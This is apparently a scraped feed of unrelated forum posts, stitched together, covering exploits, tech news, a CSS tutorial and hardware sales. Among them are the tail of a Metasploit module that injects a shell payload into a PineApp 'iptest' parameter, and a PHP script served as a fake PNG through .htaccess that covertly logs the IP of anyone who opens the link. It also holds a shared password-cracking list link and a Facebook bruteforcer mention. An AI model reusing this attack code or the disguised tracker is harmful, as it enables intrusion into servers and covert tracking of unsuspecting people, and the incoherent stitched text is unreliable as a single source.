send_request_cgi({ 'uri' => my_uri, 'cookie' => cookies, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to trigger the vulnerability 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1;#{payload.encoded}" } }) end end http://dl.packetstormsecurity.net/1307-exploits/pineapp_test_li_conn_exec.rb.txt
-
1.php [phpcode] <?php $port = $_SERVER['REMOTE_PORT']; $re = $_SERVER['HTTP_REFERER']; $data = date("j F Y g:i"); $ip = $_SERVER['REMOTE_ADDR']; $info = $data . ' ==> ' . 'IP: ' . $ip . '; PORT: ' . $port . '; REFERER: ' . $re . "\r\n"; $fp = fopen("ip.txt", "a"); fwrite ($fp, $info); fclose ($fp); $img = @imagecreatefromgif('smile.png'); Header('Content-type: image/png'); ImagePng($img); ?>[/phpcode] .htaccess Options +FollowSymlinks RewriteEngine on RewriteRule ^(.*).png$ $1.php [nc] le uploadezi pe host ip.txt si 1.png afiseaza ip-ul si daca trimiti link-ul prin messenger ex: http://site.hi2.ro/img/1.png
-
Tokyo, Japan - July 29, 2013 - Sony Corporation (‘Sony’) and Panasonic Corporation (‘Panasonic’) today announced that they have signed a basic agreement with the objective of jointly developing a next-generation standard for professional-use optical discs, with the objective of expanding their archive business for long-term digital data storage. Both companies aim to improve their development efficiency based on the technologies held by each respective company, and will target the development of an optical disc with recording capacity of at least 300GB by the end of 2015. Going forward, Sony and Panasonic will continue to hold discussions regarding the specifications and other items relating to the development of this new standard. Optical discs have excellent properties to protect them against the environment, such as dust-resistance and water-resistance, and can also withstand changes in temperature and humidity when stored. They also allow inter-generational compatibility between different formats, ensuring that data can continue to be read even as formats evolve. This makes them a robust medium for long-term storage of content. Both companies have previously developed products based on the Blu-ray™ format, leveraging the strengths of optical discs. However, both Sony and Panasonic recognized that optical discs will need to accommodate much larger volumes of storage in years to come given the expected future growth in the archive market, and responded by formulating this agreement. Sony previously commercialized a file-based optical disc archive system in September, 2012. Based on optical disc technology that Sony cultivated for its XDCAM series of professional broadcasting products, this system houses twelve optical discs within a compact cartridge as a single, high-capacity storage solution. Each disc within the cartridge holds 25GB capacity, offering a total range of storage capacities from 300GB to 1.5TB. In July this year, Panasonic launched its ‘LB-DM9 series’ of optical disc storage devices. This series uses a dedicated magazine of just 20.8mm thickness to house twelve 100GB optical discs. A maximum of 90 magazines can be stored, providing a total storage capacity of 180TB. In addition, Panasonic adopted a newly-developed changer system together with RAID technology to offer rapid data transfer performance of up to 216MB/s, while also ensuring high reliability by protecting data from unforeseen faults. In recent years, there has been an increasing need for archive capabilities, not only from video production industries, such as motion pictures and broadcasting, but also from cloud data centers that handle increasingly large volumes of data following the evolution in network services. Both Sony and Panasonic have a proven track record in developing Blu-ray Disc™ format technologies, and by actively promoting the adoption of a new standard for next-generation high-capacity optical discs, they intend to offer solutions that preserve valuable data for future generations. Via: Sony Global - Sony Global - Sony and Panasonic sign basic agreement to jointly develop standard for professional-use next-generation optical discs
-
Today we are going to show you how to mask images with shapes plus some nifty zoom animation effects with just HTML & CSS. I have seen this kind of styling and effect in many portfolio websites and let me show you how it's made. Personally, I don't think we should withhold ourself from using new technology or technique such as CSS3 on web projects because of old browsers don't support them. I believe we should "reward" users with modern browser by giving them a better user experiences. Therefore, I enjoy using CSS3 in my projects, but of course, we have to make sure it can degrades gracefully or at least display well in old browsers. This tutorial will be using CSS3 transform which means, old browsers will not show the zooming effect. Good news is, I have coded it, even if it's old browsers, it will still look pretty good and usable. If you want something hardcore, you can check out my previous tutorial - Create Beautiful Hexagon Shape With Pure CSS3. Here are some of the websites that are using the similar way in theirs portfolio page: IMAGES We want this example to be usable in most browsers, therefore, we're not going to draw the shape using CSS3 or whatever fancy techniques. We stick to the ancient way - transparent PNG. This is how each of the shape looks like: HTML To make it easy to understand, I have made an image to illustrate what each layer does. <div class="shape"> <a href="{URL}" class="overlay {round|hexagon|pentagon}"></a> <div class="details"> <span class="heading">{TITLE}</span> <hr /> <p>{DESCRIPTION}</p> <a href="{URL}" class="button">VIEW</a> </div> <div class="bg"></div> <div class="base"> <img src="{IMAGE URL}" alt="" /> </div> </div> In case you need the fonts I used in this tutorial, here is it: <link href='http://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Roboto+Slab' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Roboto+Condensed:400,700' rel='stylesheet' type='text/css'> CSS We don't have Javascript in this tutorial. We use :hover pseudo code and also CSS animation to do simple mouseover and zooming effects. Here is the portion of code that does all these animation effects: ...... .shape .overlay { display:block; width: 310px; height: 310px; position: absolute; top:-5px; left:-5px; -webkit-transform: scale(1,1); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.6s; -moz-transform: scale(1,1); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.6s; transform: scale(1,1); transition-timing-function: ease-out; transition-duration: 0.6s; z-index:500; /* allow user to actually perform actions underneath this layer */ pointer-events:none; background-repeat: no-repeat; } ...... /* hover effect */ .shape:hover .overlay { -webkit-transform: scale(1.07,1.07); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.3s; -moz-transform: scale(1.07,1.07); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.3s; } .shape:hover .bg { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=80)"; filter: alpha(opacity=80); -moz-opacity: 0.8; -khtml-opacity: 0.8; opacity: 0.8; display:block; } .shape:hover .details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; opacity: 1; z-index:450; display:block; } ...... Here is the full CSS: .shape { width: 300px; height: 300px; position: relative; } .shape .overlay { display:block; width: 310px; height: 310px; position: absolute; top:-5px; left:-5px; -webkit-transform: scale(1,1); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.6s; -moz-transform: scale(1,1); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.6s; transform: scale(1,1); transition-timing-function: ease-out; transition-duration: 0.6s; z-index:500; /* allow user to actually perform actions underneath this layer */ pointer-events:none; background-repeat: no-repeat; } /* different shapes */ .shape .overlay.round { background: url(round.png); } .shape .overlay.hexagon { background: url(hexagon.png); } .shape .overlay.pentagon { background: url(pentagon.png); } /* hover effect */ .shape:hover .overlay { -webkit-transform: scale(1.07,1.07); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.3s; -moz-transform: scale(1.07,1.07); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.3s; } .shape:hover .bg { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=80)"; filter: alpha(opacity=80); -moz-opacity: 0.8; -khtml-opacity: 0.8; opacity: 0.8; display:block; } .shape:hover .details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; opacity: 1; z-index:450; display:block; } /* content styles */ .shape .bg, .shape .details { position: absolute; width: 300px; height:300px; display:table-cell; vertical-align:middle; text-align:center; top:0; left:0; opacity:0; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease; display:none; } .shape .bg { background: #4b5a78; } .shape .details span.heading { font-family: 'Roboto Condensed', serif; font-size:30px; display:block; margin-top:70px; color:#fff; text-decoration:none; } .shape .details p { font-family: 'Abel', sans-serif; color:#fff; width: 70%; font-size:14px; margin:0 auto; } .shape a.button { padding:5px 15px; font-family: 'Abel', sans-serif; font-size:12px; -webkit-border-radius: 20px; -moz-border-radius: 20px; -ms-border-radius: 20px; -o-border-radius: 20px; border-radius: 20px; background: #2f3644; text-decoration:none; color:#fff; display:block; width:50px; margin:0 auto; text-align:center; margin-top:15px; } .shape a.button:hover { background: #fff; color: #2f3644; } Conclusion That's it, pretty simple to make and look elegant too. You can change the shape to whatever you want. This tutorial is tested on IE8 and should work in most modern browsers. If you have any questions, drop a comment. Demo | Download Source Author: Kevin Liew
-
ofer gratuit pentru cine are ce face cu ele: *fiber/t transceiver (10/100BASE-TX to 100BASE-FX media converter) *conceptronic C54Ri *wireless G Desktop Network Card version 3000fr *LG cd-rom drive CRD-8482B *cd-reWritable SW-216 *LG dvd-rom GDR-8163B *dvd-rom BDV-316E *CD-RW/DVD-ROM drive SOHC-5236V nu le-am verificat, nu stiu care dintre ele sunt in stare de functionare luate dintr-un fost depozit de calculatoare
-
vand netbook eee pc 1000HD pentru piese de schimb tastatura, hdd, camera, touchpad... etc fara display, acumulator si incarcator pret: 150 ron negociabil
-
Here you can find the Updated Password List, its still the BEST Passwordlist: Link: https://app.dumptruck.goldenfrog.com/p/O10ZURAU91 Password: maurisdump.blogspot.com
-
An alarmingly large security flaw made its way past Tumblr's oversight. Ever logged in to Tumblr on your iPhone or iPad? How about while logged in on a public Wi-Fi connection? If you answered yes to any of the above, you may want to change your Tumblr password ASAP. Tumblr has just made users aware of a serious privacy compromise that enables anybody with the ability to “sniff” traffic on public Wi-Fi networks to view Tumblr users’ passwords in unencrypted plain-text format. The problem arose because the iPad and iPhone apps fail to log users in through a secure server. An official Tumblr announcement urges Tumblr users to change their passwords immediately if they’ve used the app, and to download the newest version of the app as soon as possible: According to the Register, a reader found the bug by chance while evaluating the Tumblr apps for suitable use on his employer’s smartphones. It’s a surprisingly enormous security hole for the Yahoo-bought company to overlook. Anybody who has ever accessed Tumblr over public Wi-Fi from a mobile device, whether at an airport, a coffee shop, or a library, is at risk. Fortunately, Tumblr users don’t seem to be reporting any serious consequences. The Tumblr #password and #security tags abound with users spreading the news, but not with sob stories about compromised accounts. Even if a user does find her account has been compromised, it will be hard to peg it on this security breach in particular. Via: Time To Change Your Tumblr Password—Immediately – ReadWrite
-
Sign language is the primary language for many deaf and hard-of-hearing people. But it currently is not possible for these people to interact with computers using their native language. Because of this, researchers in recent years have spent lots of time studying the challenges of sign-language recognition, because not everyone understands sign language, and human sign-language interpreters are not always available. The researchers have examined the potential of input sensors such as data gloves or special cameras. The former provide good recognition results but are inconvenient to wear and have proven too expensive for mass use. And web cameras struggle to cope with issues such as tricky real-world backgrounds or illumination when not under controlled conditions that enable accurate hand tracking. Then along came a device called the Kinect. Researchers from Microsoft Research Asia have collaborated with colleagues from the Institute of Computing Technology at the Chinese Academy of Sciences (CAS) to explore how Kinect’s body-tracking abilities can be applied to the problem of sign-language recognition. Results have been encouraging in enabling people whose primary language is sign language to interact more naturally with their computers, in much the same way that speech recognition does. “From our point of view,” says CAS Professor Xilin Chen, “the most significant contribution is that the project demonstrates the possibility of sign-language recognition with readily available, low-cost 3-D and 2-D sensors.” The work, facilitated and supported by Microsoft Research Connections, is summarized in the paper Sign Language Recognition and Translation with Kinect, co-authored by CAS researchers Xiujuan Chai, Guang Li, Yushun Lin, Zhihao Xu, Yili Tang, and Chen, along with Ming Zhou, principal researcher at Microsoft Research Asia. Kinect, with its ability to provide depth information and color data simultaneously, makes it easier to track hand and body actions more accurately—and quickly. In this project—which is being shown during the DemoFest portion of Faculty Summit 2013, which brings more than 400 academic researchers to Microsoft headquarters to share insight into impactful research—the hand tracking leads to a process of 3-D motion-trajectory alignment and matching for individual words in sign language. The words are generated via hand tracking by the Kinect for Windows software and then normalized, and matching scores are computed to identify the most relevant candidates when a signed word is analyzed. The algorithm for this 3-D trajectory matching, in turn, has enabled the construction of a system for sign-language recognition and translation, consisting of two modes. The first, Translation Mode, translates sign language into text or speech. The technology currently supports American sign language but has potential for all varieties of sign language. The second, Communications Mode, enables communications between a hearing person and a deaf or hard-of-hearing person by use of an avatar. Guided by text input from a keyboard, the avatar can display the corresponding sign-language sentence. The deaf or hard-of-hearing person responds using sign language, and the system converts that answer into text. Does it work? Surprisingly well. “One unique contribution of this project is that it is a joint effort between software researchers and the deaf and hard of hearing,” Zhou says. “A group of teachers and students from Beijing Union University joined this project, and this enabled our algorithms to be conducted on real-world data.” Indeed, the collaboration between Microsoft Research and academia was central to the project. “We have been thrilled to see Kinect adopted by so many researchers since its launch,” says Stewart Tansley, a director for Microsoft Research Connections who is responsible for Microsoft’s academic research partnerships related to natural user interfaces. ”This project exemplifies the strong collaborative bonds between academia and Microsoft Research, as well as the continuing potential for technology to improve lives across languages and cultures around the world, ultimately bringing us all closer together.” And while the research is valuable in the realm of visual information processing, it also is intended to provide practical assistance to people who communicate primarily in sign language. “We believe that IT should be used to improve daily life for all persons,” says Guobin Wu, a research program manager from Microsoft Research Asia. “While it is still a research project, we ultimately hope this work can provide a daily interaction tool to bridge the gap between the hearing and the deaf and hard of hearing in the near future.” Via: Digital Assistance for Sign-Language Users - Inside Microsoft Research - Site Home - TechNet Blogs
-
Login page XSS, though, not content. No commenter IDs compromised ... The Guardian has fixed a minor cross-site scripting vulnerability on its website. The flaw, discovered and responsibly disclosed by security researcher Pete Houghton, occurred at the worse possible place on the UK broadsheet's website - right on its login page. Readers use the page to log in and comment on stories. In theory the flaw might have been used to phish the login credentials of Guardian readers. There's no evidence this actually happened. A Guardian News & Media spokesperson told El Reg: "We have not asked our users to change their passwords as there is no evidence that this flaw was exploited maliciously". Houghton notified the UK broadsheet about the flaw in early April and it was fixed by early June. Houghton only published a detailed write-up of the problem last week, however. The bug hunter praised The Guardian's team's overall handling of his bug report. Cross-site scripting (XSS) vulnerabilities stem from web application development mistakes. Attackers can exploit XSS bugs to inject scripts or pop-ups from untrusted sites so that they appear to surfers as originating from the site they happened to be visiting. XSS flaws are a common class of vulnerability, most regularly abused in phishing attacks. XSS bugs are bad news whenever they appear but the practical danger they pose is only really worth worrying about when they appear on banking or e-commerce websites. More on the consequences of XSS problems can be found in a guide by the Open Web Application Security Project? here. ® Via: The Grauniad corrects an error on its website • The Register
-
- cross site scripting
- the guardian
-
(and 1 more)
Tagged with:
-
Description CCTools is native IDE for Android devices. It includes C/C++/Lua/Fortran/GNU Makefile source code editor with syntax highlighting and complete android gcc toolchain for arm/mips/x86 devices. Console applications and native activity applications are supported. To execute Lua scripts, please install LuaJIT from Add-ons (Menu-Add-ons). To use fortran, please install gfortran from Add-ons. Please, remove CCTools-free application (if installed) and CCTools/backup directory from SD card before installation! Toolchain, support files and examples will downloaded and installed on first start. Required 120MB on the application's storage and 30MB on the internal SD card. Please send your feedbacks, bugs, installation problems to email: mailto://sashz@pdaXrom.org gcc toolchain sources: ndk.git - Android Tools Project Site Install Source: CCTools
-
ce ai modificat? autorul si data?
-
nu e facut de tine http://cicakgundar.net/archive/index.php/t-1089.html Facebook bruteforcer tool [Python Source]
-
The time has come to update this little script. Since Photobucket switched from Beta design to what they use now, this script has stopped working. I am sorry for the delay, I would have posted this sooner but I too have a life Anyway, the new Photobucket design is ugly, I probably don’t need to tell you that, and they had been holding off the slideshow feature for quite some time. Recently it was implemented and I hoped my script would work without much modifications… but alas, they just had to redesign it all. They used weird Javascript to load 12 images at a time, so needless to say it was not the way to go about doing this… I had to find another way. After looking around I noticed that photobucket has a mobile version of the website which is accessible with a mobile user-agent. I don’t know if the design there has changed along with main website design, if not then silly me for not spotting this sooner It means this script would of worked even after the update… but there is a catch with this. Method I use now is pretty much the same as it was before, just now everything is loaded off a mobile version of the website. When you press the Slideshow button, all the information gets written to a source file and then get fed to a Flash player that shows a slideshow. Because this uses a flash player, a specific user-agent is required, one from a mobile that supports flash player… otherwise the website is smart enough to somehow tell if that phone can play flash Well, even though I had found a method downloading images again, I cannot find a method downloading videos again… seems like the mobile version doesn’t load videos into the slideshow. But all the videos can be found in that image listing… and of course I could read the last page number, go through every page parsing HTML code to see if it contains a video and if it does then to read HTML code from the video page and finally download everything… but that is too much work for me right now and such method is very prone to error… maybe if someone could make it and send it to me, I’ll be more than happy to implement it into a script So for now, no video downloading, sorry To find the login form I used code suggested by Kyle, it worked great. Thanks Kyle! Everything can be downloaded from the same location, here: PhotobucketGetter.zip Source: Photobucket album downloader v0.7 | Kulverstukas's blog
-
- downloader
- photobucket
-
(and 1 more)
Tagged with: